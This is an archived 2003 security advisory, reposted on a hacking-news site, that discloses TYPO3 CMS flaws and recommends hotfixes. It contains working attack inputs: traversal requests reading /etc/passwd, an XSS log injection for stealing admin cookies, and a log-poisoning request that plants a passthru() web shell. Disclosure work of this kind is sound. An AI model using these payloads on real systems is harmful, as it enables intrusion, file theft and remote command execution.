Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Typo3 vulnerabilities

Typo3 vulnerabilities

by Nikola Strahija on February 28th, 2003 TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets. It offers full flexibility and extendability while featuring an accomplished set of ready-made interfaces, functions and modules. There are few vulnerabilities in it.


Vulnerability Details
=====================


0) CLIENT-SIDE DATA-OBFUSCATION

form-fields are obfuscated using client-side java-script routines.
after the fields are joined a java-script creates MD5-hashes and
submits the form.

examples: index.php (account-data), showpic.php(name-checksum)

attached perl-scripts (typo.pl/showpic.pl) demonstrate how to circumvent
this protection.


1) PATH-DISCLOSURE

several test-, class- and library-scripts can be found within webroot.
some of them can be forced to produce runtime errors and output their
physical path.

example: /fileadmin/include_test.php


2) PROOF OF FILE-EXISTENCE

"showpic.php" and "thumbs.php" allow an attacker to check the existense of
arbitrary files.

combined with file-enumeration methods it is possible to reconstruct parts
of the directory- and filesystem - structure.

example on howto check for existing files with attached perl-script "showpic.pl":
---*---
sh> showpic.pl localhost '../../../../../../../../../../etc/hosts'
../../../../../../../../../../etc/hosts exists
---*---


3) CROSS SITE SCRIPTING / COOKIE-THEFT

all system and login-errors are saved in the typo3-database.
administrators can view all the erroneous data.

since this data is not being checked for XSS-content it is possible to include
client-side script(java-script)-tags in these entries.

every time the admins view their logs these scripts will be run on the admins
web-browser which leads to a typical XSS-bug.

thus making it possible to steal the admins-cookies or let him open a new
user-account without his knowledge.


example with the attached "typo.pl" - perlscript:

---*---
sh> typo.pl localhost '><:aaa'
---*---

viewing the logfiles will execute the script.


4) ARBITRARY FILE-RETRIEVAL

the "dev/translations.php" - script does not check the
ONLY-parameter for malicious values.

a relative path combined with a Nullbyte lead to the inclusion of the
given file.

example http-request:
---*---
GET http://host/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
---*---


5) ARBITRARY COMMAND EXECUTION

extends vulnerability number 4):

if the included file contains php-source code it will be executed.
thus allowing an attacker to execute operating-system commands and
at long sight escalate his privileges.

example:
---*---

a file for placing our malicious php-source is needed.
if there is no file we have write-access we still can use the websevers-logfiles.

the following http-request:
---cut---
http://localhost/<%3f %60echo %27<%3fpassthru(%5c%24c)%3f>%27 >> ./x.php%60 %3f>
---cut---

creates this entry:

---cut---
[Tue Jan 14 19:42:53 2003] [error] [client 127.0.0.1] File does not exist: /apachepath/apache/htdocs/ )?>' >> ./x.php` ?>
---cut---

in a typicall apache - error_log file.

using the method discussed under 4) the following http-request:

---cut---
http://localhost/typo3/typo3/dev/translations.php?ONLY=relative_apache_path/apache/logs/error_log%00'
---cut---

will include the apach error_log in our output and execute our php-commands.
as a result we will find x.php in our "/dev" directory.

x.php:
---cut---

---cut---

---*---


6) SCRIPTS AND DIRECTORIES IN WEBROOT

a couple of scripts, libraries, files and directories can be found within typo3s
webroot.

"/install" is improper protected and vulnerable to brute-force attacks.
"/fileadmin" directory reveals log-files and demo-scripts
"/typo3conf" directory contains the localconf.php,database.sql and other sensitive files


=======
Remarks
=======

the serious vulnerabilities rely on the "/dev" (developer?) - directory.
scripts within this directory can be found in many/most production-environments!


====================
Recommended Hotfixes
====================
overall) install the new Version !

or

1) remove "/install" directory
2) remove "/dev" directory
3) Choose strong administrator-passwords
4) showpic.php and thumbs.php must be patched.
5) remove all demo-directories and protect "/fileadmin" and "/typo3conf"



EOF Martin Eiszner / @2002WebSec.org



=======
Contact
=======

--
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE

[email protected]
http://www.websec.org
tel: 0043 699 121772 37


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »